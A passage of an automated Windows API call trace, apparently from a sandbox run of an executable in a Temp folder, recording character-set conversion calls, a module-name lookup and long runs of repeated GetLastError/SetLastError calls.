9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0174.384] GetLastError () returned 0x6 [0174.384] SetLastError (dwErrCode=0x6) [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ") returned 256 [0174.384] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0174.384] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0174.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x9e\xad\xe6\xfc\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0174.384] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.384] GetLastError () returned 0x0 [0174.384] SetLastError (dwErrCode=0x0) [0174.384] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.398] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.398] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.398] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.398] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError 